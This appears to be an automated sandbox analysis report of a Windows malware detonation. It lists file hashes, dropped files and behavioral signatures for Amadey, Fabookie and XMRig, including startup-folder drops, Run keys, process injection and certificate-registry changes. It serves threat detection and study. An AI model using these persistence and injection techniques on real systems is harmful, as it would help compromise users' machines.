memory/1312-875-0x0000000001360000-0x00000000018AD000-memory.dmp

memory/2560-874-0x0000000003F50000-0x0000000004090000-memory.dmp

memory/2560-872-0x0000000003F50000-0x0000000004090000-memory.dmp

memory/2560-871-0x0000000000B50000-0x0000000000B51000-memory.dmp

memory/2560-876-0x0000000003F50000-0x0000000004090000-memory.dmp

memory/2560-882-0x0000000003F50000-0x0000000004090000-memory.dmp

memory/612-886-0x00000000005A0000-0x00000000005E0000-memory.dmp

memory/2780-884-0x00000000026A0000-0x0000000002E92000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 3d56a1152c50bd99ae7e94b824c3aa84
SHA1 f28e9da54c773d595e9f4e6906de7c3618769b07
SHA256 8432e210f264d43b04f97972910c6060a0177aa3d2281863ee526c0ff53e28f1
SHA512 be9eb53438e3d2efab8be1800a105895dd761b0c1dace75b1907ae1608a0415fb070ee307519bcb349dc64ab8f80be3aeb4236a1533ec60072f7940d33c6ac5c

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357

MD5 6a6f26abc83252a905f2bbc4bffe4534
SHA1 06ad7e53dbd36893ecc3494a2c828504aa9fced7
SHA256 1fd1afb620488707c5e453afa2f4b5d33b9330d04882d8f0e8782ee2e39efe07
SHA512 5f7b4ada34979e99f6706d3e09bca4f2610e0e0a42cfa019e438f6ac61c74b76f98e1dcab8e54321a0ead7d0a3db167579acb6cff3c7635da04d93b9f576035a

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357

MD5 a266bb7dcc38a562631361bbf61dd11b
SHA1 3b1efd3a66ea28b16697394703a72ca340a05bd5
SHA256 df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e
SHA512 0da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 c187a851ce4a049916b279fda5ae9fee
SHA1 4edb66f4095f8910ef4ca9c869d0fe54c0218320
SHA256 996608078048a5ed968813185a6573ef4451e9581adeaa93ee4591ce055410b3
SHA512 b3129f9d61997484adfaa586c7f33446af9fafeda6d2a6ce77039bbe9bc004cfd313d2d9be3c854b179ef3197949f17d51a64d2c47b099c637bfaf96ff4b4699

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 c1f64e0ef258bd41b7d8bbeb3e5c090a
SHA1 ad35259da289ab52ff55a1a5cc6a4be64c49d031
SHA256 6f7b571a395636fade125ffc4579c0fa09fa5596cd621b45f703bee14de5f222
SHA512 e5f3255977fdfe122f970e4f3949adf6cb9e8554876a0c2e6e368789f0903a3768a075eb22ab4055d8394e8baca417fd0a8b3e54d8e3ff4caaf7b05f45f769d4

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 b0171da4293f9d86730c0ce7483cf29c
SHA1 d464280be869bb3730c32bc5ae4ca979802ed1be
SHA256 a3512ba96ac8c2a233b5642a49ce90c80c6b58d3aadcc888294dd3027ad75962
SHA512 a2878e7a671984d73f6fbe124cd532fde26b41af0815f068b8c5fc3da1dd32ff423dc8d4d48c430b64d27a0f4df8c85c5b64176c3889f5856cd5274e9adb2c63

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\3C428B1A3E5F57D887EC4B864FAC5DCC

MD5 eae46c2ab432a15e03f513708a782051
SHA1 5adf32dc8b99f06d2fe1f4e0fd8041ade284b655
SHA256 3b399d29ef5f7d9ff775843900b35e2e005caf2d5a67a64ea7f6aad12b51447e
SHA512 6e0602575dc9073ad42ef6ebd7bfa0ec0b006f7d37125a03487c34dfd76ddda3cb51cea630728605035ec575ffc25ed252b09297fa51fea791439fbea05f398d

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\3C428B1A3E5F57D887EC4B864FAC5DCC

MD5 e4a68ac854ac5242460afd72481b2a44
SHA1 df3c24f9bfd666761b268073fe06d1cc8d4f82a4
SHA256 cb3ccbb76031e5e0138f8dd39a23f9de47ffc35e43c1144cea27d46a5ab1cb5f
SHA512 5622207e1ba285f172756f6019af92ac808ed63286e24dfecc1e79873fb5d140f1ceb7133f2476e89a5f75f711f9813a9fbb8fd5287f64adfdcc53b864f9bdc5

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 6abafa80fdc8f6d30a4cc81905669870
SHA1 b733ce6d6fc9639cedc3cd55286a859b5f3f3087
SHA256 e7e47f779fd976b80c5897e2ddc3da4bfad0029e7ef963155220c6e86c50a1af
SHA512 d8828559d7a8e1287cdbbbd7a59b8ebd41978f603696a2d2f216c94d4aed446fb4d86d1544e88fdc733d72b39d9bf11edd6ef7779e9be7c38c51ab35347b8af6

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 52598c22f1919f8b69ac1f7a178242c8
SHA1 9f606de06971e88c1092bf57da3eab9f053d994d
SHA256 2d13679e504416e221513f327274f1cf01c718d9c11a900e1d12586161fd01e9
SHA512 3a3b421343f0e62479cf0ba977437a3b9fa1ecc53cdac422dedcd6cd36ebddfd8570db550f9bb0e8b0df55bf5924f210f0aa150ae62b33c979d3dc526714ef65

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 c27a8d110e37966beceef491129f293d
SHA1 44ff3cdf91f425c6cab816532456ab0caf570114
SHA256 827524d9fdf1c1108601829fd08341b8caa239198f6c284d063e76d877a4645b
SHA512 524d03a1eff1805501953a1da6c4f96e10d7e93516e8b03a35ac8f7e67672cd906f39f232a0517e77ddc6818c94a6e4a26180abba20de3ea0e081b3991d46c14

C:\Users\Admin\AppData\Roaming\a967e0f403b652\clip64.dll

MD5 49b3faf5b84f179885b1520ffa3ef3da
SHA1 c1ac12aeca413ec45a4f09aa66f0721b4f80413e
SHA256 b89189d3fca0a41aee9d4582a8efbe820d49e87224c325b4a0f4806d96bf86a5
SHA512 018d531b3328267ecaebcb9f523c386c8aa36bf29e7b2e0f61bd96a0f7f2d03c7f25f878c373fbce7e44c8d5512e969b816ed9c72edb44afa302670c652de742

C:\Users\Admin\AppData\Roaming\a967e0f403b652\cred64.dll

MD5 4bd56443d35c388dbeabd8357c73c67d
SHA1 26248ce8165b788e2964b89d54d1f1125facf8f9
SHA256 021882d0f0cdc7275247b2ef6cc02a28cf0f02971de5b9afa947ffe7b63fb867
SHA512 100dc81a0d74725d74ed3801d7828c53c36315179427e88404cb482f83afc0e8766fd86642b4396b37dd7e3262d66d7138c8b4a175354af98254869fbdd43192

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 e3e486300f7a5e60d16da2d54f0ebaab
SHA1 bbfa9149485910b6d4ef6d009e68d8cb811e59ee
SHA256 be9969dddf21bc815b53e61b91c203dd70f70aecc1039b0c22057fb28be0a634
SHA512 0705d1262adf09d74ce14c0553dfb9f71e34cdcf393eca999f8ef7ae33a34f746e062749e805dcf90ad56d3bbc0f9840fc845ab14c85e2300ea78bf946433126

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 5fb16cbeb4586fdb0b944cedeef1258f
SHA1 4b14b8a23c85ae1781682307ed2690110cf1b0e4
SHA256 d325e39ba1781f964571b110acebfec494fa7860b5111eb17f5c55ec3ce4bdc2
SHA512 7b0abcbb84bdf305435e7564c9c31065285ce0ef3df83df1a4a677c5a4708483803bb0af0d91aaa21b27aabc9fbcfad3b1cb933bfb423943e2404910855700bf

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 361c0b8c80e64a74c7c54ac45e55c088
SHA1 8aa251164798e8cc8f7bff95bfb55955ab0ddf19
SHA256 41f5484b2988e219a7c7fc82a3b5f000e58315a8c9a22259d68ffb9bc7667970
SHA512 33d1b3fc91add5c86a3251e4396690bd62c1681f06d6819a97455088fd442c3471fa1686b1fb4502b094b58f3ea8bc5a873155da16ac1c71b40b2b4b3f06360b

C:\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe

MD5 1afff8d5352aecef2ecd47ffa02d7f7d
SHA1 8b115b84efdb3a1b87f750d35822b2609e665bef
SHA256 c41acc53cde89b94d55d6932ddd55a212ba910e1fade3da138670bb5b18ae4e1
SHA512 e5dc54c60be702e11772dc729eec5ec7140f293545aa3d57282adacddf686483393b0c940bbd397a9d50a6cda093865b143ae00c51ce3bf5d6b00241f97b3cdb

C:\Users\Admin\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\AAF33CF37E194E98957768CF9C02DE8E2\download.error

MD5 fd2727132edd0b59fa33733daa11d9ef
SHA1 63e36198d90c4c2b9b09dd6786b82aba5f03d29a
SHA256 3a72dbedc490773f90e241c8b3b839383a63ce36426a4f330a0f754b14b4d23e
SHA512 3e251be7d0e8db92d50092a4c4be3c74f42f3d564c72981f43a8e0fe06427513bfa0f67821a61a503a4f85741f0b150280389f8f4b4f01cdfd98edce5af29e6e

C:\Users\Admin\AppData\Local\Temp\osloader.exe

MD5 e2f68dc7fbd6e0bf031ca3809a739346
SHA1 9c35494898e65c8a62887f28e04c0359ab6f63f5
SHA256 b74cd24cef07f0226e7b777f7862943faee4cf288178b423d5344b0769dc15d4
SHA512 26256a12b5b8b3a40b34f18e081cdb45ea11845589c9d458a79385a4b8178f32164b417ddc9346fab8299bc6d4b9fedb620274c4edf9321424f37a2e2a6de579

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\PL78BP4I\suggestions[1].en-US

MD5 5a34cb996293fde2cb7a4ac89587393a
SHA1 3c96c993500690d1a77873cd62bc639b3a10653f
SHA256 c6a5377cbc07eece33790cfc70572e12c7a48ad8296be25c0cc805a1f384dbad
SHA512 e1b7d0107733f81937415104e70f68b1be6fd0ca65dccf4ff72637943d44278d3a77f704aedff59d2dbc0d56a609b2590c8ec0dd6bc48ab30f1dad0c07a0a3ee

C:\Users\Admin\AppData\Local\Temp\Symbols\winload_prod.pdb\768283CA443847FB8822F9DB1F36ECC51\download.error

MD5 5da3a881ef991e8010deed799f1a5aaf
SHA1 fea1acea7ed96d7c9788783781e90a2ea48c1a53
SHA256 f18fdb9e03546bfb98397bcb8378b505eaf4ac061749229a7ee92a1c3cf156e4
SHA512 24fbcb5353a3d51ee01f1de1bbb965f9e40e0d00e52c42713d446f12edceeb8d08b086a8687a6188decaa8f256899e24a06c424d8d73adaad910149a9c45ef09

Analysis: behavioral2

Detonation Overview

Submitted: 2023-10-04 22:00

Reported: 2023-10-04 22:03

Platform: win10v2004-20230915-en

Max time kernel: 133s

Max time network: 151s

Command Line

C:\Windows\Explorer.EXE

Signatures

Amadey

trojan amadey

Detect Fabookie payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Fabookie

spyware stealer fabookie

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Downloads MZ/PE file

Drops file in Drivers directory

Description Indicator Process Target
File opened for modification C:\Windows\system32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\is-SKTLI.tmp\8758677____.exe N/A

Stops running service(s)

evasion

.NET Reactor protector

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1926387074-3400613176-3566796709-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Pictures\ZRBeoPgeGj8CxG9qYs8sjAht.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1926387074-3400613176-3566796709-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1926387074-3400613176-3566796709-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\is-SKTLI.tmp\8758677____.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\5nEFLhvur3PfnWFfqazVcbhe.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dGIPEz9n7OVcihVvNtfHAic4.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\kO1KRPG4oOONnPKyWWQ2An2Q.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pVTXkOiHKAHqCqYAnM2rV6H6.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Kr27Ey1NE3Y5Notxl7fEKGsO.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TZSRnhFzitYjo4TnClmGKisZ.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\onywQULHStPc8A2RYT8Y8uYa.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0uoHVTc55FxRhaUsghlx8u5i.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\C6PPl873Avd8oxJhqrrnG8Bj.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XnjZeeJD8ofcRSwPBBC26dmy.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\m2P2rA2RW0F7IB2YG1D51LnQ.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\Pictures\B1MtcJ18Lphr2749qh03SbWR.exe N/A
N/A N/A C:\Users\Admin\Pictures\ZRBeoPgeGj8CxG9qYs8sjAht.exe N/A
N/A N/A C:\Users\Admin\Pictures\yfbdsjlje4JOSrr5jnDosrVb.exe N/A
N/A N/A C:\Users\Admin\Pictures\b8BD8mUZg1QzK4WHCOlyefC6.exe N/A
N/A N/A C:\Users\Admin\Pictures\FDIwW1gq0WDUJMX44AqGq19O.exe N/A
N/A N/A C:\Users\Admin\Pictures\InrSNGhXx4T6LsNwqSxd93uX.exe N/A
N/A N/A C:\Users\Admin\Pictures\kepPL1XOY5LSSrh2bfHa1ijC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe N/A
N/A N/A C:\Users\Admin\Pictures\eszj1FzD5qG7Qoq4NGLteMV8.exe N/A
N/A N/A C:\Users\Admin\Pictures\WmYtLkKaP9RNVnFfd1iN0jGZ.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-COA0R.tmp\InrSNGhXx4T6LsNwqSxd93uX.tmp N/A
N/A N/A C:\Users\Admin\Pictures\eszj1FzD5qG7Qoq4NGLteMV8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\eszj1FzD5qG7Qoq4NGLteMV8.exe N/A
N/A N/A C:\Users\Admin\Pictures\eszj1FzD5qG7Qoq4NGLteMV8.exe N/A
N/A N/A C:\Users\Admin\Pictures\eszj1FzD5qG7Qoq4NGLteMV8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-SKTLI.tmp\8758677____.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000042051\s6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe N/A
N/A N/A C:\Program Files\Microsoft Office 15\TFZIZKLLGT\lightcleaner.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5a-73843-b69-7dcb7-18de614ef0c69\Waegumeqolu.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-4743J.tmp\lightcleaner.tmp N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310042200461\assistant\Assistant_100.0.4815.21_Setup.exe_sfx.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310042200461\assistant\assistant_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310042200461\assistant\assistant_installer.exe N/A

Reads user/profile data of web browsers

spyware stealer

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1926387074-3400613176-3566796709-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\s6.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1000042051\\s6.exe" C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Mozilla Maintenance Service\\Civutisudi.exe\"" C:\Users\Admin\AppData\Local\Temp\is-SKTLI.tmp\8758677____.exe N/A

Checks installed software on the system

discovery

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\F: C:\Users\Admin\Pictures\eszj1FzD5qG7Qoq4NGLteMV8.exe N/A
File opened (read-only) \??\D: C:\Users\Admin\Pictures\eszj1FzD5qG7Qoq4NGLteMV8.exe N/A
File opened (read-only) \??\F: C:\Users\Admin\Pictures\eszj1FzD5qG7Qoq4NGLteMV8.exe N/A
File opened (read-only) \??\D: C:\Users\Admin\Pictures\eszj1FzD5qG7Qoq4NGLteMV8.exe N/A

Legitimate hosting services abused for malware hosting/C2

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 4516 set thread context of 1640 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
PID 4616 set thread context of 6044 N/A C:\Program Files\Google\Chrome\updater.exe C:\Windows\System32\conhost.exe
PID 4616 set thread context of 6080 N/A C:\Program Files\Google\Chrome\updater.exe C:\Windows\explorer.exe

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files\Microsoft Office 15\TFZIZKLLGT\lightcleaner.exe C:\Users\Admin\AppData\Local\Temp\is-SKTLI.tmp\8758677____.exe N/A
File opened for modification C:\Program Files (x86)\LightCleaner\VTRegScan.dll C:\Users\Admin\AppData\Local\Temp\is-4743J.tmp\lightcleaner.tmp N/A
File created C:\Program Files (x86)\LightCleaner\unins000.dat C:\Users\Admin\AppData\Local\Temp\is-4743J.tmp\lightcleaner.tmp N/A
File created C:\Program Files (x86)\LightCleaner\is-K12OK.tmp C:\Users\Admin\AppData\Local\Temp\is-4743J.tmp\lightcleaner.tmp N/A
File opened for modification C:\Program Files (x86)\LightCleaner\unins000.dat C:\Users\Admin\AppData\Local\Temp\is-4743J.tmp\lightcleaner.tmp N/A
File created C:\Program Files (x86)\Mozilla Maintenance Service\Civutisudi.exe C:\Users\Admin\AppData\Local\Temp\is-SKTLI.tmp\8758677____.exe N/A
File opened for modification C:\Program Files (x86)\LightCleaner\LightCleaner.exe C:\Users\Admin\AppData\Local\Temp\is-4743J.tmp\lightcleaner.tmp N/A
File opened for modification C:\Program Files (x86)\LightCleaner\CircularProgressBar.dll C:\Users\Admin\AppData\Local\Temp\is-4743J.tmp\lightcleaner.tmp N/A
File created C:\Program Files (x86)\LightCleaner\is-GAF4Q.tmp C:\Users\Admin\AppData\Local\Temp\is-4743J.tmp\lightcleaner.tmp N/A
File created C:\Program Files\Google\Chrome\updater.exe C:\Users\Admin\Pictures\FDIwW1gq0WDUJMX44AqGq19O.exe N/A
File created C:\Program Files (x86)\Mozilla Maintenance Service\Civutisudi.exe.config C:\Users\Admin\AppData\Local\Temp\is-SKTLI.tmp\8758677____.exe N/A
File created C:\Program Files (x86)\LightCleaner\is-QQE4Q.tmp C:\Users\Admin\AppData\Local\Temp\is-4743J.tmp\lightcleaner.tmp N/A
File created C:\Program Files (x86)\LightCleaner\is-AGPK8.tmp C:\Users\Admin\AppData\Local\Temp\is-4743J.tmp\lightcleaner.tmp N/A
File created C:\Program Files\Microsoft Office 15\TFZIZKLLGT\lightcleaner.exe.config C:\Users\Admin\AppData\Local\Temp\is-SKTLI.tmp\8758677____.exe N/A
File created C:\Program Files (x86)\LightCleaner\is-DRIA0.tmp C:\Users\Admin\AppData\Local\Temp\is-4743J.tmp\lightcleaner.tmp N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\AppCompat\Programs\Amcache.hve.tmp C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe N/A

Enumerates physical storage devices

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\System32\schtasks.exe N/A
N/A N/A C:\Windows\System32\schtasks.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
